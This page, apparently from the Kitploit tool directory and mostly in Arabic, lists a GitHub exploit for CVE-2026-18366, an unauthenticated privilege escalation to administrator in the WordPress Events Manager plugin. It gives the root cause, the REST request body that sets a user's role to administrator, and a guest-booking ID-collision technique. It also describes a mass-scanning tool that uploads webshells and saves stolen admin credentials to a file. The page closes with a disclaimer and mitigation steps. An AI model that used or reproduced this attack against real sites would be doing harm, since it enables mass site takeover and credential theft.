Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - تصعيد صلاحيات غير مصادق عليه إلى مسؤول | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-18366
تصعيد الامتيازاتماسحات الثغرات الأمنية للويبالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلال
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - تصعيد صلاحيات غير مصادق عليه إلى مسؤول

عرض المستودع
225منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-18366

Events Manager < 7.4.1 - تصعيد غير مصادق للصلاحيات إلى مسؤول

CVE CVSS WordPress

Typing SVG


🔗 ابقَ على اطلاع

Telegram

لأحدث الثغرات غير المكتشفة (Zero-Days) والاستغلالات والأبحاث الأمنية

Telegram Channel


📋 نظرة عامة على الثغرة

السمةالتفاصيل
معرف CVECVE-2026-18366
الخطورة🔴 حرجة (CVSS 9.8)
الإضافةEvents Manager لـ WordPress
الإصدارات المتأثرة< 7.4.1
نوع الثغرةتصعيد صلاحيات غير مصادق
متجه الهجومالشبكة
المصادقة المطلوبةلا شيء

🔍 الوصف الفني

تحليل السبب الجذري

توجد الثغرة في EM\Archetypes::map_meta_cap داخل classes/em-archetypes.php. تقوم الإضافة بتحديد نطاق غير صحيح لتعيين الصلاحيات من خلال:

  1. معاملة أي معرف كائن (object ID) على أنه معرف مقال (post ID)
  2. إذا كان المقال نوع محتوى مخصص (CPT) من نوع event أو location، فإنها تمسح $caps = []
  3. لا تعيد أبدًا ملء الصلاحيات لـ edit_user أو delete_user أو promote_user
  4. الصلاحيات الفارغة → has_cap() تُرجع true، حتى للمستخدم 0 (الضيف)

متجه الهجوم

POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

الشرط: يجب أن يكون {id} مساويًا لـ wp_posts.ID لنوع محتوى مخصص (CPT) من نوع event أو location.

⚠️ واجهة REST غير المصادقة لا تتطلب nonce (لا يوجد ملف تعريف ارتباط لتسجيل الدخول).

استغلال الحجز كضيف

الحجوزات كضيف (dbem_bookings_anonymous=1 افتراضيًا) تُنشئ مستخدمين حقيقيين في WordPress، مما يتيح فرض تصادم المعرفات. يكون nonce الخاص بالحجز متاحًا للعموم في نماذج الأحداث.


🚀 الاستخدام

المتطلبات

pip install aiohttp

بدء سريع

python CVE-2026-18366.py

سيطلب السكربت ما يلي:

  • list → مسار ملف قائمة الأهداف (الافتراضي: list.txt)
  • speed → عدد العاملين المتزامنين (الافتراضي: 10)

خيارات سطر الأوامر

python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
الخيارالوصف
-l, --listمسار الملف الذي يحتوي على عناوين الأهداف
-s, --speedعدد العاملين المتزامنين (1-200)
--timeoutمهلة الطلب بالثواني (الافتراضي: 20)

تنسيق قائمة الأهداف

أنشئ ملف list.txt مع هدف واحد في كل سطر:

https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 المخرجات

مخرجات الكونسول

[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

ملف النتائج

تُحفظ الاختراقات الناجحة في adminS.txt:

https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 سير عمل الاستغلال

┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ الميزات

  • بنية غير متزامنة (Async) → فحص متزامن عالي الأداء
  • مسارا هجوم مزدوجان → تصادم المعرفات + استغلال الحجز كضيف
  • رفع شل تلقائي → نشر ويبشل عبر الإضافة/القالب
  • كشف الإصدار → تحديد تلقائي للإصدارات المعرّضة للثغرة
  • تعداد أسماء مستخدمين ذكي → تقنيات تعداد متعددة
  • التحقق من تسجيل الدخول → التحقق عبر ملفات تعريف الارتباط (Cookie) + XML-RPC
  • تصعيد الامتيازات → ترقية تلقائية إلى مسؤول

📁 هيكل الملفات

├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ إخلاء المسؤولية

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ التخفيف

إذا كنت مسؤول WordPress:

  1. حدّث الإضافة Events Manager إلى الإصدار 7.4.1 أو أحدث
  2. دقق حسابات المستخدمين بحثًا عن تغييرات غير مصرح بها
  3. راجع سجلات الوصول بحثًا عن نشاط مشبوه في REST API
  4. نفّذ قواعد WAF لتصفية الطلبات الخبيثة

تنزيل الأداة